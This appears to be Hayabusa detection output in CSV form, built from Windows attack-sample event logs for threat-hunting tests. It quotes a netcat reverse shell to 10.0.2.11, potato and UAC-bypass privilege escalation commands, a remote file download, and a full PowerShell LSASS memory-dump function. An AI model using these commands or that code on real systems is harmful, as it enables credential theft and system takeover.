""cmd.exe"" | LID: 0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.519 +00:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.519 +00:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.562 +00:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.562 +00:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.587 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 
747F3D96-DE14-5EB9-0000-00107C0F4300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:21:56.661 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:22:26.650 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:22:26.650 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-11 23:22:26.650 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 15:06:49.019 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 
747F3D96-BB89-5EBA-0000-001057413600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.019 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.183 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.184 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.184 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.211 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 
+2020-05-12 15:06:49.390 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.390 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.390 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.390 +00:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-12 15:06:49.447 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:28:16.122 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 00:28:52.873 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 00:28:52.914 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 747F3D96-3F44-5EBB-0000-0010EA933700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 00:28:52.950 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-24 01:13:47.756 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 
747F3D96-CA4B-5EC9-0000-0010B8CB3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:48.864 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:50.327 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 747F3D96-CA4E-5EC9-0000-00109FE23700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:50.330 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:51.206 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:51.206 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: 
C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:54.120 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:54.120 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:54.120 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 01:13:54.120 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = 
Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception 
$ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,low,Disc,Suspicious Process Discovery With Get-Process,,rules/sigma/powershell/powershell_script/posh_ps_susp_get_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 14:24:08.254 +00:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 20:50:25.546 +00:00,MSEDGEWIN10,10,high,,Process 
Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 747F3D96-59BB-5EFB-0000-0010D81B6400,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-06-30 20:50:25.546 +00:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/proc_access_win_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-06-30 20:50:25.546 +00:00,MSEDGEWIN10,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-02 17:51:37.819 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.819 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious 
Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.822 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.872 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.872 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 17:51:37.872 +00:00,MSEDGEWIN10,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-02 18:00:29.615 
+00:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.615 +00:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.617 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.650 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.650 
+00:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.650 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-02 18:00:29.650 +00:00,LAPTOP-JU4M3I0E,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 08:47:20.037 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: 